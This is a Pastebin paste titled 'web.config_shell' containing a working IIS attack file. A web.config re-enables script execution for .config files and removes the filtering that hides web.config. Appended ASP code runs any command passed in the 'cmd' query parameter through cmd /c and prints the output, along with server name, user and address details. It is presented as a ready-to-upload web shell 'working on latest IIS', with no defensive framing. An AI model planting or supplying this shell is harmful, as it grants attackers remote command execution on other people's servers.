API tools faq
paste
Advertisement
gm0

web.config_shell

gm0
Jul 10th, 2018
204
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.07 KB | None | 0 0
raw download clone embed print report
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <configuration>
  3. <system.webServer>
  4. <handlers accessPolicy="Read, Script, Write">
  5. <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified"
  6. requireAccess="Write" preCondition="bitness64" />
  7. </handlers>
  8. <security>
  9. <requestFiltering>
  10. <fileExtensions>
  11. <remove fileExtension=".config" />
  12. </fileExtensions>
  13. <hiddenSegments>
  14. <remove segment="web.config" />
  15. </hiddenSegments>
  16. </requestFiltering>
  17. </security>
  18. </system.webServer>
  19. </configuration>
  20. <!--
  21. ASP Webshell
  22. Working on latest IIS
  23. Referance :-
  24. https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
  25. http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
  26. http://www.w3schools.com/asp/
  27. -->
  28.  
  29.  
  30. <%
  31. Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  32. Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  33. Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  34. Function getCommandOutput(theCommand)
  35. Dim objShell, objCmdExec
  36. Set objShell = CreateObject("WScript.Shell")
  37. Set objCmdExec = objshell.exec(thecommand)
  38. getCommandOutput = objCmdExec.StdOut.ReadAll
  39. end Function
  40. %>
  41.  
  42.  
  43. <HTML>
  44. <BODY>
  45. <FORM action="" method="GET">
  46. <input type="text" name="cmd" size=45 value="<%= szCMD %>">
  47. <input type="submit" value="Run">
  48. </FORM>
  49. <PRE>
  50. <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
  51. <%Response.Write(Request.ServerVariables("server_name"))%>
  52. <p>
  53. <b>The server's port:</b>
  54. <%Response.Write(Request.ServerVariables("server_port"))%>
  55. </p>
  56. <p>
  57. <b>The server's software:</b>
  58. <%Response.Write(Request.ServerVariables("server_software"))%>
  59. </p>
  60. <p>
  61. <b>The server's software:</b>
  62. <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
  63. <% szCMD = request("cmd")
  64. thisDir = getCommandOutput("cmd /c" & szCMD)
  65. Response.Write(thisDir)%>
  66. </p>
  67. <br>
  68. </BODY>
  69. </HTML>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!